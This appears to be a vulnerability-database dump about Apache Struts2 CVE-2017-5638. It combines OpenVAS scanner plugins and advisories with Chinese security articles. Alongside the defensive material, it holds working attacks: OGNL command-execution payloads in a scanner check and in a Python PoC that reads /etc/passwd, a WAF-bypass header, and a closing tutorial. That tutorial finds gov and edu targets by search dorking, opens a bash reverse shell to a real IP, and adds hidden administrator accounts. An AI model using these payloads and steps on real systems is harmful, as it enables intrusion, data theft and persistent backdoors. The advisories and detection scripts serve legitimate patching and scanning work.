script_name(\"Atlassian Crowd Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_crowd_detect.nasl\");\n script_mandatory_keys(\"atlassian_crowd/installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Crowd uses a version of Struts 2 that is vulnerable to 
CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Crowd 2.8.3 until 2.9.6, 2.10.1 until 2.10.2 and 2.11.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.9.7, 2.10.3, 2.11.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/CWD-4879\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"2.8.3\", test_version2: \"2.9.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.9.7\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"2.10.1\", test_version2: \"2.10.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.10.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_is_equal(version: version, test_version: \"2.11.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.11.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:01", "description": "HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.", "cvss3": {}, "published": "2017-04-10T00:00:00", "type": "openvas", "title": "HPE Universal CMDB Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106736", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106736", "sourceData": "###############################################################################\n# OpenVAS Vulnerability 
Test\n# $Id: gb_hpe_universal_cmdb_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# HPE Universal CMDB Remote Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:hp:universal_cmbd_foundation';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106736\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-10 12:58:34 +0200 (Mon, 10 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"HPE Universal CMDB Remote Code Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n 
script_dependencies(\"gb_hpe_universal_cmdb_detect.nasl\");\n script_mandatory_keys(\"HP/UCMDB/Installed\");\n\n script_tag(name:\"summary\", value:\"HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A potential security vulnerability in Jakarta Multipart parser in Apache\nStruts has been addressed in HPE Universal CMDB. This vulnerability could be remotely exploited to allow code\nexecution via mishandled file upload.\");\n\n script_tag(name:\"affected\", value:\"HP Universal CMDB Foundation Software v10.22 CUP5\");\n\n script_tag(name:\"solution\", value:\"HPE has made mitigation information available to resolve the vulnerability\nfor the impacted versions of HPE Universal CMDB.\");\n\n script_xref(name:\"URL\", value:\"https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03733en_us\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: version, test_version: \"10.22\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n 
script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n 
action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n \"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-06-07T13:16:58", "description": "I have always believed that sharing with others is a good trait, and I have learned many things that will serve me for a lifetime from several security researchers in the bug bounty field, so I decided to share some of my recent small discoveries in this article, in the hope that they can help FreeBuf readers start their own bug bounty journey sooner. \n![](/Article/UploadPic/2017-6/201767192643555.png?www.myhack58.com) \nJust a few months ago, a security researcher found a serious security vulnerability in Apache Struts2, CVE-2017-5638; some of you have probably heard of it. 
This is a remote code execution vulnerability, and at the time a large number of web applications on the Internet were affected by it. About three weeks later, researchers released exploit code for Struts2. \nDuring an earlier bug-hunting investigation, I came across the following link: \nhttps://svdevems01.direct.gq1.yahoo.com/sm/login.jsp \nThis is a Yahoo login page. \n![](/Article/UploadPic/2017-6/201767192643648.png?www.myhack58.com) \nI tried to find vulnerabilities in this page, but unfortunately found nothing, until I found the following endpoint: \nhttps://svdevems01.direct.gq1.yahoo.com/sm/login/loginpagecontentgrabber.do \nNote: if an endpoint address contains .action, .do or .go, that indicates the web application is running Struts2. \nAs I said before, exploit code for the Struts2 vulnerability had already been released, and exploiting it is very simple. Although I knew there was a vulnerability here, the ready-made exploit code did not work, so I suspected that a web application firewall was interfering, or that something was blocking my attack. \nSince I was able to determine that there really was a vulnerability here, I could not stop. But to submit a valid vulnerability, I had to provide a working PoC to prove that the vulnerability was valuable. After a period of research, I found a tweet that described how to bypass the WAF with a payload and successfully exploit this vulnerability. \nThe detection method I used requires sending a specially crafted packet using the Content-Type HTTP header; the header data is shown below: \nContent-Type:%{#context[\u2018com.opensymphony.xwork2.dispatcher.HttpServletResponse\u2019].addHeader(\u2018X-Ack-Th3g3nt3lman-POC\u2019,4*4)}.multipart/form-data 
\nThis specially constructed request not only makes the web server multiply two numbers; you can also make the web server perform any other kind of operation. In the example above, the request asks for the value of 4 * 4 and the server returns 16, which means that this server has the security vulnerability. \nAs shown in the figure below, the response will contain the new header, i.e. X-Ack-Th3g3nt3lman-POC: 16 \n![](/Article/UploadPic/2017-6/201767192643394.png?www.myhack58.com) \nThis was enough for me to submit a vulnerability report to Yahoo through HackerOne. Yahoo's technical staff triaged the vulnerability within 30 minutes of receiving the report, then promptly took the affected application offline to fix the issue, and a few days later I received a $5,500 vulnerability bounty from Yahoo. \nIn fact, finding bugs is not hard; as long as you are willing to spend the time and willing to think, I believe bounties of thousands of dollars are easily within everyone's reach. Finally, I hope these small discoveries of mine bring everyone some inspiration in their own bug-hunting. 
\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-06-07T00:00:00", "type": "myhack58", "title": "Bug-hunting experience | See how I found a Yahoo remote code execution vulnerability and got a $5,500 bounty-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-07T00:00:00", "id": "MYHACK58:62201786819", "href": "http://www.myhack58.com/Article/html/3/62/2017/86819.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T09:25:02", "description": "Recently, the China National Vulnerability Database of Information Security (CNNVD) received reports about the Apache Struts2 (S2-045) remote code execution vulnerability (CNNVD-201703-152). 
Because the vulnerability affects a wide range of versions and is highly severe, CNNVD has tracked and analyzed it; the situation is as follows: \nI. Vulnerability introduction\nApache Struts is an open source project maintained by the Apache Software Foundation (a US organization). It is an open source MVC framework for creating enterprise Java web applications and is shipped in two main versions: Struts 1 and Struts 2. \nApache Struts versions 2.3.5 – 2.3.31 and 2.5 – 2.5.10 contain a remote code execution vulnerability (CNNVD-201703-152, CVE-2017-5638). The vulnerability exists because the exception handling of the file upload functionality does not properly handle error messages derived from user input, so a remote attacker can send malicious packets to exploit the vulnerability and execute arbitrary commands on the affected server. \nII. Vulnerability impact\nAn attacker can send a malformed HTTP request to exploit the vulnerability and execute system commands on the affected server, and can go on to completely control the server, causing denial of service, data leakage, website tampering and other effects. Since exploitation requires no preconditions such as enabling the dmi or debug functions or enabling any plugins, the vulnerability is particularly serious. \nIII. Remediation\nApache has released a security bulletin for this vulnerability. Affected users should check whether they are affected. \nSelf-check method\nUsers can check the struts-core.x.x.jar file in the /WEB-INF/lib/ directory under the web application directory; if the version is between Struts 2.3.5 and Struts 2.3.31 or between Struts 2.5 and Struts 2.5.10, the vulnerability is present. 
\nUpgrade fix\nAffected users can upgrade to Apache Struts 2.3.32 or Apache Struts 2.5.10.1 to eliminate the vulnerability. \nTemporary mitigation\nUsers who cannot upgrade conveniently may take the following temporary measure: \n- Delete the commons-fileupload-x.x.x.jar file; this will make the upload function unavailable. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "myhack58", "title": "About the Apache Struts2 (S2-045) vulnerability briefing-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-07T00:00:00", "id": "MYHACK58:62201784024", "href": "http://www.myhack58.com/Article/html/3/62/2017/84024.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-10T13:31:12", "description": "0x1 Overview \nMany corporate websites use Apache open source projects to build HTTP servers, and most of them use the Apache sub-project Struts. 
However, because the Apache Struts2 product code carries considerable risk, Struts2 has frequently suffered multiple high-risk vulnerabilities since 2007. \nAccording to official Apache data, 56 vulnerabilities numbered S2-001 to S2-056 were published from 2007 to 2018, of which 9 are remote code execution (RCE) vulnerabilities. \nIn March 2017 the high-risk vulnerability S2-045 (CVE-2017-5638) was reported: file upload based on the Jakarta Multipart parser can lead to RCE. It affects Struts 2.3.5 – Struts 2.3.31 and Struts 2.5 – Struts 2.5.10, and it is still being exploited in attacks. \nIn April 2018 the Tencent YuJian Threat Intelligence Center monitored a hacker group exploiting this vulnerability to compromise web servers in bulk and implant a mining Trojan (for details, see the article on how an unpatched Apache Struts 2 vulnerability led to web servers being compromised in bulk). Recently the YuJian Threat Intelligence Center has again monitored a similar attack. \nIn this attack, the hackers use the attack tool WinStr045 to detect vulnerable web servers on the network. On the vulnerable machines found, they remotely execute various commands to escalate privileges, create accounts and gather system information, then implant the Trojan downloader mas.exe, which downloads further Trojans from multiple C&C addresses: the privilege escalation Trojans o3.exe/o6.exe and the mining Trojan netxmr4.0.exe. 
\nBecause the module name “koi” is loaded after the mining Trojan netxmr decrypts its code, the Tencent YuJian Threat Intelligence Center has named it KoiMiner. Interestingly, to ensure its own mining succeeds, the intruder's code checks the CPU consumption of system processes; if CPU usage exceeds 40%, it terminates the process in order to reserve system resources for mining. \nBased on code tracing analysis, researchers at the Tencent YuJian Threat Intelligence Center believe that the KoiMiner family of mining Trojans is probably a collaborative “practice” work shared among several people in hacker forums and underground mining communities. \nAttack process \nNote: Struts is a web application framework based on the MVC design pattern. Using the framework, developers can clearly separate business logic code from the presentation layer and focus on the business logic and the mapping relationships in the configuration file. Struts2 combines Struts and WebWork, taking the advantages of both, and uses an interceptor mechanism to process user requests so that business logic can be completely decoupled from the Servlet API. \n0x2 Detailed analysis \n0x2.1 Intrusion \nDetecting whether the target system has the S2-045 vulnerability \nAttacking a vulnerable system \nSelecting a penetration command in the intrusion tool \nDuring the intrusion, the command to execute can be selected or customized. The selectable commands are common Windows and Linux penetration commands, including viewing system version information, network connection status and open ports, adding a new user with administrator privileges to the system, enabling the remote connection service, and other operations. \nA directory listing command is used to check whether the C:\\Windows\\Help and C:\\ProgramData directories have already been implanted with the Trojan; if not, the mas.exe Trojan is deployed. At implantation time, the C# code is first written to the text file mas.cs, which is then compiled into the executable mas.exe with the .NET compiler. \nFirst, a command is executed to create mas.cs and write the downloader code into it. \nThen a command is executed to compile mas.cs into mas.exe with the .NET compiler. \nA command then uses mas.exe to download the mining Trojan netxmr4.0. \nSome of the attack targets are as follows: \nThe implanted mas.exe is only 4 KB in size and is stored in the ProgramData directory. From the YuJian Threat Intelligence Center's monitoring records it can be seen that mas.exe downloads netxmr4.exe (mining Trojan), o3.exe/o6.exe (privilege escalation Trojans) and other Trojans from multiple C2 addresses. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-07-10T00:00:00", "type": "myhack58", "title": "Apache Struts2 high-risk vulnerabilities cause the Enterprise Server is the invasion mounted KoiMiner mining Trojan-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-07-10T00:00:00", "id": "MYHACK58:62201890758", "href": "http://www.myhack58.com/Article/html/3/62/2018/90758.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T09:25:04", "description": "It has been more than six months since FreeBuf last exposed a Struts 2 vulnerability. This vulnerability is an RCE (remote code execution) vulnerability. Simply put, when file upload is based on the Jakarta Multipart parser, the vulnerability can be exploited for remote code execution. 
The vulnerability was reported by Nike Zheng of NSFOCUS. \nApache Struts is an open source project maintained by the Apache Software Foundation (a US organization); it is an open source MVC framework for creating enterprise Java web applications. \nVulnerability number\nCVE-2017-5638 \nVulnerability description\nStruts does not properly parse file upload requests with the Jakarta parser; a remote attacker can construct a malicious Content-Type header that leads to remote command execution. \nIn fact, in the default.properties file the struts.multipart.parser setting has two options, jakarta and pell (there was originally a third option, cos). The jakarta parser is a standard component of the Struts 2 framework and is enabled by default, so the seriousness of the vulnerability needs to be taken to heart. \nScope of impact\nStruts 2.3.5 – Struts 2.3.31 \nStruts 2.5 – Struts 2.5.10 \nSolution\nIf you are using the Jakarta-based file upload Multipart parser, upgrade to Apache Struts 2.3.32 or 2.5.10.1; alternatively, switch to a different implementation of the file upload Multipart parser. \nVulnerability PoC \n#!/usr/bin/env python \n# encoding:utf-8 \nimport urllib2 \nimport sys \nfrom poster.encode import multipart_encode \nfrom poster.streaminghttp import register_openers \nheader = { \n\"Host\":\"alumnus.shu.edu.cn\", \n\"Connection\":\"keep-alive\", \n\"Refer\":\"alumnus.shu.edu.cn\", \n\"Accept\":\"*/*\", \n\"X-Requested-With\":\"XMLHttpRequest\", \n\"Accept-Encoding\":\"deflate\", \n\"Accept-Language\":\"zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4\", \n} \ndef poc(): \n    register_openers() \n    datagen, headers = multipart_encode({\"image1\": open(\"tmp.txt\", \"rb\")}) \n    header[\"User-Agent\"]=\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36\" \n    # the OGNL expression is placed in Content-Type, which the Jakarta parser echoes into an error message that Struts then evaluates \n    header[\"Content-Type\"]=\"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\" \n    request = urllib2.Request(str(sys.argv[1]),datagen,headers=header) \n    response = urllib2.urlopen(request) \n    print response.read() \n\npoc() \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "myhack58", "title": "Apache Struts2 exposure arbitrary code execution vulnerability (S2-045,CVE-2017-5638)-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-07T00:00:00", "id": "MYHACK58:62201784026", "href": "http://www.myhack58.com/Article/html/3/62/2017/84026.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-03-08T11:52:28", "description": "1.1 CVE-2017-5638 vulnerability profile\nApache Struts 2 is the world's most popular Java web server framework. However, a high-risk security vulnerability, CVE-2017-5638 (S02-45), has been found in Struts 2; it affects Struts 2.3.5 - Struts 2.3.31 and Struts 2.5 - Struts 2.5.10 \nVulnerability ID: CVE-2017-5638 \nVulnerability rating: HIGH \nVulnerability name: S2-045: Struts 2 remote code execution vulnerability\nVulnerability impact: possible RCE during file upload based on the Jakarta Multipart parser \nAffected versions: Struts 2.3.5-Struts 2.3.31 \nStruts 2.5-Struts 2.5.10 \nFix: \nUpgrade to Struts 2.3.32 or Struts 2.5.10.1 \nStruts 2.3.32 download address: \nhttps://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32 \nStruts 2.5.10.1 download: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1 \nVulnerability principle: there is a problem in how Struts2 parses the Content-Type header of an uploaded file by default. When parsing fails, the error message is evaluated as OGNL code. \n1.2 Impact assessment\nActual testing shows that wherever the vulnerability exists, server privileges are obtained on both Windows and Linux. The harm is great; for many people tonight will surely be a sleepless night. \n1.3 Practical exploitation\n1.3.1 Preparation\n1. Prepare a JSP webshell and save it on a website, for example as 1.txt or another text file, for download over the network. \n2. Prepare a server with an independent IP, with nc.exe on it. \n3. Prepare a Python environment. \nPython 2.7.13 is generally used, download address: https://www.python.org/downloads/release/python-2713/; select the installer according to your operating system version. After installation, the first run will report an error and a module needs to be installed, as shown in Figure 1. The poster.encode module must be installed; download address: https://pypi.python.org/pypi/poster/, then go to that directory and run python setup.py install. Note that if the Python system variables are not set, you need to run it with the full path. 
For example: \nC:\\Python27\\python.exe C:\\Python27\\poster-0.8.1\\setup.py install \nFigure 1 The missing poster.encode module \n4. Obtain various action pages \n(1) Use ZoomEye to obtain various action pages by searching for index.action, login.action, info.action and the like. \n(2) The Baidu search method\ninurl:index. actionsite:edu. cn \ninurl:index. actionsite:gov. cn \ninurl:index. actionsite:com. cn \nNote: do not cause damage; the Cybersecurity Law is now very strict!!! \n1.3.2 Modify the PoC exploit code\n1. For the Linux version, modify the whoami value to: bash-i>& /dev/tcp/122.115.47.39/4433 0>&1 \nHere 122.115.47.39 is the IP of the listening server for the reverse connection and 4433 is the port; then save the file as poclinux.py as shown in Figure 2. Other common commands can also be used: id, whoami, cat /etc/passwd, cat /etc/shadow, etc. You can modify the corresponding parameter and save under a different name. \nFigure 2 Modifying the Linux PoC exploit code\n2. For Windows servers, modify the whoami value to: \nnet user antian365$ Wsantian365!*/ add \nnet localgroup administratorsantian365$ /add \nSave the PoC files as 